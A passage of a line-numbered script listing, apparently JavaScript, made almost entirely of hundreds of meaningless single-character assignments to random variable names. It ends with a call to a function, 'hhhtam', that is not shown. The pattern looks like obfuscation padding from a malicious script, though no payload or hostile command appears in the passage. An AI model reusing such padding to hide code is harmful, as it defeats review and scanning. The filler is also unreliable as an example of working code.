739 | jfdunreo = "b"; | |
740 | jfdunreo = "H"; | |
741 | tuisssgb = "Z"; | |
742 | tuisssgb = "P"; | |
743 | tuisssgb = "R"; | |
744 | tuisssgb = "g"; | |
745 | tuisssgb = "D"; | |
746 | tuisssgb = "y"; | |
747 | tuisssgb = "Q"; | |
748 | tuisssgb = "j"; | |
749 | tuisssgb = "Q"; | |
750 | tuisssgb = "y"; | |
751 | tuisssgb = "X"; | |
752 | tuisssgb = "v"; | |
753 | tuisssgb = "x"; | |
754 | tuisssgb = "t"; | |
755 | tuisssgb = "u"; | |
756 | tuisssgb = "n"; | |
757 | tuisssgb = "k"; | |
758 | tuisssgb = "n"; | |
759 | tuisssgb = "O"; | |
760 | tuisssgb = "N"; | |
761 | tuisssgb = "R"; | |
762 | tuisssgb = "e"; | |
763 | tuisssgb = "D"; | |
764 | tuisssgb = "c"; | |
765 | tuisssgb = "c"; | |
766 | tuisssgb = "Z"; | |
767 | tuisssgb = "U"; | |
768 | tuisssgb = "c"; | |
769 | tuisssgb = "g"; | |
770 | tuisssgb = "u"; | |
771 | tuisssgb = "v"; | |
772 | tuisssgb = "i"; | |
773 | tuisssgb = "K"; | |
774 | tuisssgb = "q"; | |
775 | tuisssgb = "E"; | |
776 | tuisssgb = "a"; | |
777 | tuisssgb = "I"; | |
778 | tuisssgb = "B"; | |
779 | tuisssgb = "C"; | |
780 | tuisssgb = "f"; | |
781 | tuisssgb = "R"; | |
782 | tuisssgb = "z"; | |
783 | tuisssgb = "C"; | |
784 | hkshlfxx = "G"; | |
785 | hkshlfxx = "T"; | |
786 | hkshlfxx = "O"; | |
787 | hkshlfxx = "p"; | |
788 | hkshlfxx = "R"; | |
789 | hkshlfxx = "A"; | |
790 | hkshlfxx = "6"; | |
791 | lwdpkfyo = "v"; | |
792 | lwdpkfyo = "S"; | |
793 | lwdpkfyo = "g"; | |
794 | lwdpkfyo = "E"; | |
795 | lwdpkfyo = "e"; | |
796 | lwdpkfyo = "y"; | |
797 | lwdpkfyo = "s"; | |
798 | lwdpkfyo = "v"; | |
799 | lwdpkfyo = "C"; | |
800 | lwdpkfyo = "x"; | |
801 | lwdpkfyo = "Q"; | |
802 | lwdpkfyo = ":"; | |
803 | xlqnhtbb = "O"; | |
804 | xlqnhtbb = "i"; | |
805 | xlqnhtbb = "C"; | |
806 | xlqnhtbb = "L"; | |
807 | xlqnhtbb = "v"; | |
808 | xlqnhtbb = "B"; | |
809 | xlqnhtbb = "b"; | |
810 | xlqnhtbb = "C"; | |
811 | xlqnhtbb = "g"; | |
812 | xlqnhtbb = "T"; | |
813 | xlqnhtbb = "f"; | |
814 | xlqnhtbb = "D"; | |
815 | xlqnhtbb = "t"; | |
816 | xlqnhtbb = "9"; | |
817 | lizulmnc = "E"; | |
818 | lizulmnc = "n"; | |
819 | lizulmnc = "B"; | |
820 | lizulmnc = "Z"; | |
821 | lizulmnc = "Q"; | |
822 | lizulmnc = "A"; | |
823 | lizulmnc = "Y"; | |
824 | lizulmnc = "w"; | |
825 | lizulmnc = "m"; | |
826 | lizulmnc = "W"; | |
827 | lizulmnc = "z"; | |
828 | lizulmnc = "k"; | |
829 | lizulmnc = "u"; | |
830 | lizulmnc = "A"; | |
831 | lizulmnc = "m"; | |
832 | lizulmnc = "q"; | |
833 | lizulmnc = "A"; | |
834 | lizulmnc = "A"; | |
835 | lizulmnc = "R"; | |
836 | lizulmnc = "p"; | |
837 | lizulmnc = "b"; | |
838 | lizulmnc = "b"; | |
839 | lizulmnc = "W"; | |
840 | lizulmnc = "U"; | |
841 | lizulmnc = "u"; | |
842 | lizulmnc = "D"; | |
843 | lizulmnc = "c"; | |
844 | lizulmnc = "c"; | |
845 | lizulmnc = "j"; | |
846 | lizulmnc = "R"; | |
847 | lizulmnc = "w"; | |
848 | lizulmnc = "A"; | |
849 | lizulmnc = "b"; | |
850 | lizulmnc = "U"; | |
851 | abxxldmaz = "g"; | |
852 | abxxldmaz = "n"; | |
853 | abxxldmaz = "B"; | |
854 | abxxldmaz = "e"; | |
855 | abxxldmaz = "w"; | |
856 | abxxldmaz = "s"; | |
857 | abxxldmaz = "T"; | |
858 | abxxldmaz = "c"; | |
859 | abxxldmaz = "P"; | |
860 | abxxldmaz = "z"; | |
861 | abxxldmaz = "I"; | |
862 | abxxldmaz = "v"; | |
863 | abxxldmaz = "W"; | |
864 | abxxldmaz = "i"; | |
865 | abxxldmaz = "t"; | |
866 | abxxldmaz = "g"; | |
867 | abxxldmaz = "X"; | |
868 | abxxldmaz = "z"; | |
869 | abxxldmaz = "p"; | |
870 | abxxldmaz = "C"; | |
871 | abxxldmaz = "n"; | |
872 | abxxldmaz = "T"; | |
873 | abxxldmaz = "i"; | |
874 | fjbxpn = "v"; | |
875 | fjbxpn = "b"; | |
876 | fjbxpn = "e"; | |
877 | fjbxpn = "b"; | |
878 | fjbxpn = "o"; | |
879 | fjbxpn = "r"; | |
880 | fjbxpn = "R"; | |
881 | fjbxpn = "x"; | |
882 | fjbxpn = "T"; | |
883 | fjbxpn = "Q"; | |
884 | xlcsnv = "t"; | |
885 | xlcsnv = "e"; | |
886 | xlcsnv = "Y"; | |
887 | xlcsnv = "p"; | |
888 | xlcsnv = "_"; | |
889 | iylfrme = "M"; | |
890 | iylfrme = "z"; | |
891 | iylfrme = "o"; | |
892 | iylfrme = "B"; | |
893 | iylfrme = "X"; | |
894 | iylfrme = "c"; | |
895 | iylfrme = "E"; | |
896 | iylfrme = "e"; | |
897 | iylfrme = "A"; | |
898 | iylfrme = "A"; | |
899 | iylfrme = "c"; | |
900 | iylfrme = "u"; | |
901 | iylfrme = "b"; | |
902 | iylfrme = "i"; | |
903 | iylfrme = "Q"; | |
904 | iylfrme = "o"; | |
905 | iylfrme = "P"; | |
906 | iylfrme = "Y"; | |
907 | iylfrme = "F"; | |
908 | iylfrme = "O"; | |
909 | iylfrme = "O"; | |
910 | iylfrme = "w"; | |
911 | iylfrme = "5"; | |
912 | ilukledq = "r"; | |
913 | ilukledq = "k"; | |
914 | ilukledq = "K"; | |
915 | ilukledq = "c"; | |
916 | ilukledq = "O"; | |
917 | ilukledq = "U"; | |
918 | ilukledq = "w"; | |
919 | ilukledq = "L"; | |
920 | ilukledq = "W"; | |
921 | laubkhqkm = "K"; | |
922 | laubkhqkm = "T"; | |
923 | laubkhqkm = "B"; | |
924 | laubkhqkm = "b"; | |
925 | laubkhqkm = "D"; | |
926 | laubkhqkm = "f"; | |
927 | laubkhqkm = "S"; | |
928 | laubkhqkm = "x"; | |
929 | laubkhqkm = "r"; | |
930 | laubkhqkm = "Y"; | |
931 | laubkhqkm = "i"; | |
932 | laubkhqkm = "W"; | |
933 | laubkhqkm = "T"; | |
934 | laubkhqkm = "d"; | |
935 | laubkhqkm = "f"; | |
936 | laubkhqkm = "f"; | |
937 | laubkhqkm = "e"; | |
938 | laubkhqkm = "R"; | |
939 | laubkhqkm = "B"; | |
940 | laubkhqkm = "w"; | |
941 | laubkhqkm = "q"; | |
942 | bkaev = "q"; | |
943 | bkaev = "t"; | |
944 | bkaev = "M"; | |
945 | bkaev = "a"; | |
946 | bkaev = "w"; | |
947 | bkaev = "w"; | |
948 | bkaev = "k"; | |
949 | bkaev = "D"; | |
950 | bkaev = "y"; | |
951 | bkaev = "I"; | |
952 | bkaev = "j"; | |
953 | bkaev = "C"; | |
954 | bkaev = "j"; | |
955 | bkaev = "C"; | |
956 | bkaev = "A"; | |
957 | bkaev = "V"; | |
958 | bkaev = "j"; | |
959 | bkaev = "s"; | |
960 | bkaev = "v"; | |
961 | bkaev = "L"; | |
962 | bkaev = "Z"; | |
963 | bkaev = "G"; | |
964 | bkaev = "S"; | |
965 | bkaev = "a"; | |
966 | bkaev = "k"; | |
967 | bkaev = "U"; | |
968 | bkaev = "Y"; | |
969 | bkaev = "T"; | |
970 | bkaev = "O"; | |
971 | bkaev = "j"; | |
972 | bkaev = "K"; | |
973 | peemmc = "m"; | |
974 | peemmc = "K"; | |
975 | peemmc = "E"; | |
976 | peemmc = "P"; | |
977 | peemmc = "P"; | |
978 | peemmc = "O"; | |
979 | peemmc = "b"; | |
980 | peemmc = "i"; | |
981 | peemmc = "S"; | |
982 | peemmc = "V"; | |
983 | peemmc = "K"; | |
984 | peemmc = "w"; | |
985 | peemmc = "X"; | |
986 | peemmc = "U"; | |
987 | peemmc = "A"; | |
988 | peemmc = "j"; | |
989 | jhtfyn = "y"; | |
990 | jhtfyn = "n"; | |
991 | jhtfyn = "g"; | |
992 | jhtfyn = "g"; | |
993 | jhtfyn = "n"; | |
994 | jhtfyn = "H"; | |
995 | jhtfyn = "P"; | |
996 | jhtfyn = "E"; | |
997 | jhtfyn = "O"; | |
998 | jhtfyn = "v"; | |
999 | jhtfyn = "X"; | |
1000 | jhtfyn = "F"; | |
1001 | jhtfyn = "a"; | |
1002 | jhtfyn = "b"; | |
1003 | jhtfyn = "f"; | |
1004 | jhtfyn = "J"; | |
1005 | jhtfyn = "t"; | |
1006 | jhtfyn = "t"; | |
1007 | jhtfyn = "d"; | |
1008 | jhtfyn = "E"; | |
1009 | jhtfyn = "E"; | |
1010 | jhtfyn = "n"; | |
1011 | xuvhkoj = "o"; | |
1012 | xuvhkoj = "G"; | |
1013 | xuvhkoj = "h"; | |
1014 | xuvhkoj = "I"; | |
1015 | xuvhkoj = " "; | |
1016 | rsrmenjp = "B"; | |
1017 | rsrmenjp = "v"; | |
1018 | rsrmenjp = "l"; | |
1019 | rsrmenjp = "t"; | |
1020 | rsrmenjp = "d"; | |
1021 | rsrmenjp = "o"; | |
1022 | rsrmenjp = "p"; | |
1023 | rsrmenjp = "J"; | |
1024 | rsrmenjp = "H"; | |
1025 | rsrmenjp = "T"; | |
1026 | rsrmenjp = "G"; | |
1027 | rsrmenjp = "h"; | |
1028 | rsrmenjp = "E"; | |
1029 | rsrmenjp = "N"; | |
1030 | rsrmenjp = "B"; | |
1031 | rsrmenjp = "I"; | |
1032 | rsrmenjp = "l"; | |
1033 | rsrmenjp = "o"; | |
1034 | rsrmenjp = "G"; | |
1035 | rsrmenjp = "q"; | |
1036 | rsrmenjp = "U"; | |
1037 | rsrmenjp = "u"; | |
1038 | rsrmenjp = "B"; | |
1039 | rsrmenjp = "x"; | |
1040 | rsrmenjp = "M"; | |
1041 | rsrmenjp = "U"; | |
1042 | rsrmenjp = "o"; | |
1043 | rsrmenjp = "x"; | |
1044 | rsrmenjp = "r"; | |
1045 | rsrmenjp = "i"; | |
1046 | rsrmenjp = "i"; | |
1047 | rsrmenjp = "u"; | |
1048 | rsrmenjp = "z"; | |
1049 | rsrmenjp = "w"; | |
1050 | rsrmenjp = "x"; | |
1051 | ylfvkvkhr = "M"; | |
1052 | ylfvkvkhr = "F"; | |
1053 | ylfvkvkhr = "s"; | |
1054 | ylfvkvkhr = "y"; | |
1055 | ylfvkvkhr = "H"; | |
1056 | ylfvkvkhr = "J"; | |
1057 | ylfvkvkhr = "X"; | |
1058 | ylfvkvkhr = "J"; | |
1059 | ylfvkvkhr = "F"; | |
1060 | ylfvkvkhr = "K"; | |
1061 | ylfvkvkhr = "p"; | |
1062 | ylfvkvkhr = "b"; | |
1063 | ylfvkvkhr = "P"; | |
1064 | ylfvkvkhr = "J"; | |
1065 | ylfvkvkhr = "J"; | |
1066 | ylfvkvkhr = "O"; | |
1067 | ylfvkvkhr = "i"; | |
1068 | ylfvkvkhr = "D"; | |
1069 | ylfvkvkhr = "y"; | |
1070 | ylfvkvkhr = "h"; | |
1071 | ktgpqdz = "r"; | |
1072 | ktgpqdz = "m"; | |
1073 | ktgpqdz = "c"; | |
1074 | ktgpqdz = "E"; | |
1075 | ktgpqdz = "K"; | |
1076 | ktgpqdz = "g"; | |
1077 | ktgpqdz = "s"; | |
1078 | ktgpqdz = "H"; | |
1079 | ktgpqdz = "n"; | |
1080 | ktgpqdz = "D"; | |
1081 | ktgpqdz = "M"; | |
1082 | ktgpqdz = "z"; | |
1083 | ktgpqdz = "F"; | |
1084 | ktgpqdz = "E"; | |
1085 | ktgpqdz = "c"; | |
1086 | ktgpqdz = "l"; | |
1087 | ktgpqdz = "s"; | |
1088 | ktgpqdz = "p"; | |
1089 | ktgpqdz = "p"; | |
1090 | xjmnfbmb = "s"; | |
1091 | xjmnfbmb = "U"; | |
1092 | xjmnfbmb = "G"; | |
1093 | xjmnfbmb = "l"; | |
1094 | xjmnfbmb = "P"; | |
1095 | xjmnfbmb = "d"; | |
1096 | xjmnfbmb = "T"; | |
1097 | xjmnfbmb = "J"; | |
1098 | xjmnfbmb = "."; | |
1099 | uuyvyq = "U"; | |
1100 | uuyvyq = "R"; | |
1101 | uuyvyq = "T"; | |
1102 | uuyvyq = "M"; | |
1103 | uuyvyq = "v"; | |
1104 | uuyvyq = "d"; | |
1105 | uuyvyq = "X"; | |
1106 | uuyvyq = "N"; | |
1107 | uuyvyq = "N"; | |
1108 | uuyvyq = "q"; | |
1109 | uuyvyq = "U"; | |
1110 | uuyvyq = "%"; | |
1111 | gndfbva = "Y"; | |
1112 | gndfbva = "w"; | |
1113 | gndfbva = "s"; | |
1114 | gndfbva = "k"; | |
1115 | gndfbva = "o"; | |
1116 | gndfbva = "v"; | |
1117 | gndfbva = "A"; | |
1118 | gndfbva = "l"; | |
1119 | gndfbva = "a"; | |
1120 | gndfbva = "U"; | |
1121 | gndfbva = "F"; | |
1122 | gndfbva = "u"; | |
1123 | gndfbva = "b"; | |
1124 | gndfbva = "V"; | |
1125 | gndfbva = "Y"; | |
1126 | gndfbva = "f"; | |
1127 | gndfbva = "u"; | |
1128 | yhvhg = "H"; | |
1129 | yhvhg = "w"; | |
1130 | yhvhg = "S"; | |
1131 | yhvhg = "w"; | |
1132 | yhvhg = "y"; | |
1133 | yhvhg = "q"; | |
1134 | yhvhg = "@"; | |
1135 | jclmmjdfo = "K"; | |
1136 | jclmmjdfo = "M"; | |
1137 | jclmmjdfo = "b"; | |
1138 | jclmmjdfo = "l"; | |
1139 | jclmmjdfo = "g"; | |
1140 | jclmmjdfo = "E"; | |
1141 | jclmmjdfo = "J"; | |
1142 | jclmmjdfo = "L"; | |
1143 | amyhx = "G"; | |
1144 | amyhx = "T"; | |
1145 | amyhx = "Z"; | |
1146 | amyhx = "a"; | |
1147 | amyhx = "z"; | |
1148 | amyhx = "z"; | |
1149 | amyhx = "V"; | |
1150 | amyhx = "a"; | |
1151 | amyhx = "Q"; | |
1152 | amyhx = "s"; | |
1153 | amyhx = "y"; | |
1154 | amyhx = "K"; | |
1155 | amyhx = "X"; | |
1156 | amyhx = "Z"; | |
1157 | amyhx = "i"; | |
1158 | amyhx = "i"; | |
1159 | amyhx = "i"; | |
1160 | amyhx = "C"; | |
1161 | amyhx = "b"; | |
1162 | amyhx = "V"; | |
1163 | amyhx = "n"; | |
1164 | amyhx = "z"; | |
1165 | amyhx = "l"; | |
1166 | amyhx = "g"; | |
1167 | amyhx = "f"; | |
1168 | amyhx = "S"; | |
1169 | amyhx = "E"; | |
1170 | amyhx = "G"; | |
1171 | amyhx = "F"; | |
1172 | amyhx = "g"; | |
1173 | tsvgtsa = "q"; | |
1174 | tsvgtsa = "F"; | |
1175 | tsvgtsa = "E"; | |
1176 | tsvgtsa = "Y"; | |
1177 | tsvgtsa = "c"; | |
1178 | tsvgtsa = "p"; | |
1179 | tsvgtsa = "Y"; | |
1180 | tsvgtsa = "d"; | |
1181 | tsvgtsa = "U"; | |
1182 | tsvgtsa = "C"; | |
1183 | tsvgtsa = "M"; | |
1184 | tsvgtsa = "e"; | |
1185 | tsvgtsa = "c"; | |
1186 | tsvgtsa = "n"; | |
1187 | tsvgtsa = "A"; | |
1188 | tsvgtsa = "J"; | |
1189 | tsvgtsa = "N"; | |
1190 | tsvgtsa = "t"; | |
1191 | tsvgtsa = "L"; | |
1192 | tsvgtsa = "T"; | |
1193 | tsvgtsa = "a"; | |
1194 | tsvgtsa = "U"; | |
1195 | tsvgtsa = "K"; | |
1196 | tsvgtsa = "d"; | |
1197 | tsvgtsa = "K"; | |
1198 | tsvgtsa = "g"; | |
1199 | tsvgtsa = "u"; | |
1200 | tsvgtsa = "T"; | |
1201 | tsvgtsa = "O"; | |
1202 | shwlqequ = "s"; | |
1203 | shwlqequ = "l"; | |
1204 | shwlqequ = "G"; | |
1205 | shwlqequ = "m"; | |
1206 | shwlqequ = "T"; | |
1207 | shwlqequ = "U"; | |
1208 | shwlqequ = "e"; | |
1209 | shwlqequ = "j"; | |
1210 | shwlqequ = "x"; | |
1211 | shwlqequ = "X"; | |
1212 | shwlqequ = "D"; | |
1213 | shwlqequ = "D"; | |
1214 | shwlqequ = "O"; | |
1215 | shwlqequ = "H"; | |
1216 | shwlqequ = "e"; | |
1217 | shwlqequ = "D"; | |
1218 | shwlqequ = "q"; | |
1219 | shwlqequ = "C"; | |
1220 | shwlqequ = "H"; | |
1221 | shwlqequ = "G"; | |
1222 | shwlqequ = "d"; | |
1223 | shwlqequ = "R"; | |
1224 | shwlqequ = "t"; | |
1225 | shwlqequ = "O"; | |
1226 | shwlqequ = "W"; | |
1227 | shwlqequ = "r"; | |
1228 | shwlqequ = "Q"; | |
1229 | shwlqequ = "d"; | |
1230 | bvwwh = "H"; | |
1231 | bvwwh = "Y"; | |
1232 | bvwwh = "d"; | |
1233 | bvwwh = "a"; | |
1234 | goijnk = "l"; | |
1235 | goijnk = "Q"; | |
1236 | goijnk = "E"; | |
1237 | goijnk = "F"; | |
1238 | goijnk = "r"; | |
1239 | goijnk = "u"; | |
1240 | goijnk = "c"; | |
1241 | goijnk = "C"; | |
1242 | goijnk = "W"; | |
1243 | goijnk = "S"; | |
1244 | goijnk = "y"; | |
1245 | goijnk = "P"; | |
1246 | goijnk = "z"; | |
1247 | goijnk = "P"; | |
1248 | goijnk = "x"; | |
1249 | goijnk = "B"; | |
1250 | goijnk = "P"; | |
1251 | goijnk = "z"; | |
1252 | goijnk = "E"; | |
1253 | goijnk = "g"; | |
1254 | goijnk = "t"; | |
1255 | goijnk = "S"; | |
1256 | goijnk = "E"; | |
1257 | goijnk = "d"; | |
1258 | goijnk = "I"; | |
1259 | goijnk = "u"; | |
1260 | goijnk = "o"; | |
1261 | goijnk = "N"; | |
1262 | goijnk = "H"; | |
1263 | goijnk = "z"; | |
1264 | goijnk = "c"; | |
1265 | goijnk = "B"; | |
1266 | goijnk = "w"; | |
1267 | goijnk = "F"; | |
1268 | goijnk = "S"; | |
1269 | goijnk = "B"; | |
1270 | goijnk = "l"; | |
1271 | goijnk = "e"; | |
1272 | goijnk = "d"; | |
1273 | goijnk = "C"; | |
1274 | goijnk = "n"; | |
1275 | goijnk = "E"; | |
1276 | dohht = "A"; | |
1277 | dohht = "C"; | |
1278 | dohht = "b"; | |
1279 | dohht = "Y"; | |
1280 | dohht = "m"; | |
1281 | dohht = "R"; | |
1282 | dohht = "T"; | |
1283 | dohht = "f"; | |
1284 | dohht = "C"; | |
1285 | dohht = "U"; | |
1286 | dohht = "A"; | |
1287 | dohht = "z"; | |
1288 | dohht = "u"; | |
1289 | dohht = "l"; | |
1290 | dohht = "U"; | |
1291 | dohht = "t"; | |
1292 | dohht = "j"; | |
1293 | dohht = "T"; | |
1294 | dohht = "e"; | |
1295 | dohht = "f"; | |
1296 | dohht = "V"; | |
1297 | dohht = "c"; | |
1298 | dohht = "t"; | |
1299 | dohht = "N"; | |
1300 | llmdxu = "D"; | |
1301 | llmdxu = "c"; | |
1302 | llmdxu = "d"; | |
1303 | llmdxu = "C"; | |
1304 | llmdxu = "u"; | |
1305 | llmdxu = "I"; | |
1306 | llmdxu = "p"; | |
1307 | llmdxu = "8"; | |
1308 | eoaves = "M"; | |
1309 | eoaves = "o"; | |
1310 | eoaves = "K"; | |
1311 | eoaves = "j"; | |
1312 | eoaves = "o"; | |
1313 | eoaves = "t"; | |
1314 | eoaves = "V"; | |
1315 | eoaves = "q"; | |
1316 | eoaves = "v"; | |
1317 | eoaves = "d"; | |
1318 | eoaves = "T"; | |
1319 | eoaves = "r"; | |
1320 | eoaves = "b"; | |
1321 | eoaves = "t"; | |
1322 | eoaves = "u"; | |
1323 | eoaves = "i"; | |
1324 | eoaves = "f"; | |
1325 | qmnebka = "E"; | |
1326 | qmnebka = "X"; | |
1327 | qmnebka = "p"; | |
1328 | qmnebka = "j"; | |
1329 | qmnebka = "I"; | |
1330 | qmnebka = "g"; | |
1331 | qmnebka = "r"; | |
1332 | qmnebka = "p"; | |
1333 | qmnebka = "P"; | |
1334 | qmnebka = "c"; | |
1335 | qmnebka = "q"; | |
1336 | qmnebka = "M"; | |
1337 | qmnebka = "g"; | |
1338 | qmnebka = "p"; | |
1339 | qmnebka = "Z"; | |
1340 | qmnebka = "o"; | |
1341 | qmnebka = "B"; | |
1342 | qmnebka = "c"; | |
1343 | qmnebka = "e"; | |
1344 | qmnebka = "b"; | |
1345 | qmnebka = "I"; | |
1346 | qmnebka = "Q"; | |
1347 | qmnebka = "Y"; | |
1348 | waihq = "v"; | |
1349 | waihq = "c"; | |
1350 | waihq = "t"; | |
1351 | waihq = "u"; | |
1352 | waihq = "K"; | |
1353 | waihq = "Q"; | |
1354 | waihq = "w"; | |
1355 | waihq = "a"; | |
1356 | waihq = "j"; | |
1357 | waihq = "c"; | |
1358 | waihq = "e"; | |
1359 | waihq = "a"; | |
1360 | waihq = "Z"; | |
1361 | waihq = "V"; | |
1362 | waihq = "J"; | |
1363 | waihq = "C"; | |
1364 | waihq = "-"; | |
1365 | waxant = "L"; | |
1366 | waxant = "X"; | |
1367 | waxant = "s"; | |
1368 | waxant = "X"; | |
1369 | waxant = "M"; | |
1370 | waxant = "Q"; | |
1371 | waxant = "L"; | |
1372 | waxant = "q"; | |
1373 | waxant = "b"; | |
1374 | waxant = "w"; | |
1375 | waxant = "i"; | |
1376 | waxant = "L"; | |
1377 | waxant = "E"; | |
1378 | waxant = "O"; | |
1379 | waxant = "f"; | |
1380 | waxant = "b"; | |
1381 | waxant = "h"; | |
1382 | waxant = "C"; | |
1383 | waxant = "x"; | |
1384 | waxant = "v"; | |
1385 | waxant = "e"; | |
1386 | waxant = "c"; | |
1387 | waxant = "N"; | |
1388 | waxant = "D"; | |
1389 | waxant = "F"; | |
1390 | waxant = "S"; | |
1391 | waxant = "C"; | |
1392 | waxant = "P"; | |
1393 | waxant = "K"; | |
1394 | waxant = "D"; | |
1395 | waxant = "J"; | |
1396 | waxant = "v"; | |
1397 | hhhtam ( ); |
|